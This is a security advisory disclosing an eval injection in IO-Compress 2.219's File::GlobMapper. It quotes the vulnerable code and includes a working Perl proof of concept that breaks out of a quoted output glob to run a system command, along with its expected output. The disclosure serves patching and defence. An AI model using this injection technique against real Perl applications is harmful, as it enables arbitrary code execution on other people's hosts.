📄 IO-Compress 2.219 Eval Injection

### Summary
    
    An eval injection vulnerability in `File::GlobMapper::_getFiles()` allows any attacker who can control the output fileglob argument passed to `IO::Compress::Gzip::gzip()`, `IO::Compress::Zip::zip()`, or any sibling function to execute arbitrary Perl code in the context of the running process.
    No authentication is required. Impact is complete: confidentiality, integrity, and availability of the host process are fully compromised.
    
    ---
    
    ### Details
    
    `File::GlobMapper::_parseOutputGlob()` builds an output filename template by wrapping the caller-supplied output pattern in Perl double-quotes and storing the result. `_getFiles()` then passes that string directly to `eval` without
    any sanitisation:
    
    **`lib/File/GlobMapper.pm:316–321`**
    ```perl
    $string =~ s/${noPreBS}#(\d)/\${$1}/g;
    $string =~ s#${noPreBS}\*#\${inFile}#g;
    $string = '"' . $string . '"';      # wrapped in double-quotes
    $self->{OutputPattern} = $string;   # stored verbatim — no escaping
    ```
    
    **`lib/File/GlobMapper.pm:342`**
    ```perl
    eval "\$outFile = $self->{OutputPattern};" ;   # executed — injection point
    ```
    
    `File::GlobMapper` is invoked automatically whenever **both** the input and output arguments to an `IO::Compress::*` / `IO::Uncompress::*` function are fileglob strings (delimited by `< >`). This is a documented, common calling
    convention. Affected functions include `gzip`, `zip`, `bzip2`, `deflate`, `rawdeflate`, and all `IO::Uncompress::*` counterparts.
    
    Any character that closes the surrounding double-quoted Perl string — a literal `"`, a backtick, `${...}`, or `@{...}` — followed by arbitrary Perl code is executed verbatim.
    
    ---
    
    ### PoC
    
    Save as `poc.pl` and run with `perl poc.pl`:
    
    ```perl
    #!/usr/bin/perl
    use strict;
    use warnings;
    use File::Temp qw(tempdir);
    use IO::Compress::Gzip qw(gzip);
    
    my $dir      = tempdir(CLEANUP => 1);
    my $sentinel = "/tmp/CVE_GlobMapper_RCE_$$";
    
    # Create a legitimate input file that the input glob will match
    open my $fh, '>', "$dir/test.txt" or die $!;
    print $fh "data\n";
    close $fh;
    
    my $malicious = qq(<$dir/out.gz"; system("touch $sentinel"); #>);
    
    print "Sentinel before: ", (-e $sentinel ? "EXISTS" : "absent"), "\n";
    
    eval { gzip "<$dir/*.txt>" => $malicious };
    
    if (-e $sentinel) {
        print "EXPLOITED — arbitrary command executed via eval injection\n";
        print "Sentinel: $sentinel\n";
        unlink $sentinel;
    } else {
        print "Did not fire (check error: $@)\n";
    }
    ```
    
    **Expected output:**
    ```
    Sentinel before: absent
    EXPLOITED — arbitrary command executed via eval injection
    Sentinel: /tmp/CVE_GlobMapper_RCE_<pid>
    ```
    
    Confirmed on IO-Compress 2.219 / Perl 5.40.1 / Ubuntu 26.04.
    
    ---
    
    ### Impact
    
    This is a **remote code execution** vulnerability. Any web application, API service, CLI tool, or batch-processing pipeline that accepts user input and passes it as the output fileglob argument to any `IO::Compress::*` function is vulnerable. The injected code runs with the full privileges of the calling process.
    
    **Who is impacted:** Developers and operators of Perl applications that use `IO::Compress::*` functions with the fileglob calling convention and where the output pattern is derived from untrusted input - such as filename templates from web forms, REST API parameters, CLI arguments, or configuration files controlled by non-privileged users.
    
    In setuid or privileged-daemon contexts, exploitation yields code execution at the elevated privilege level. The bug has been present since the initial release of `File::GlobMapper` (≈ 2005) and is present on every Linux distribution that ships the `perl` package.
    
    
    ### References
    
    - https://nvd.nist.gov/vuln/detail/CVE-2026-48962
    - https://github.com/pmqs/IO-Compress/commit/f2db247bf90d4cc7ee2710be384946081f3b4610.patch
    - https://github.com/pmqs/IO-Compress/issues/73
    - https://metacpan.org/release/PMQS/IO-Compress-2.220/changes
    - http://www.openwall.com/lists/oss-security/2026/05/27/4
    - https://github.com/advisories/GHSA-q6wx-vhvq-x7h6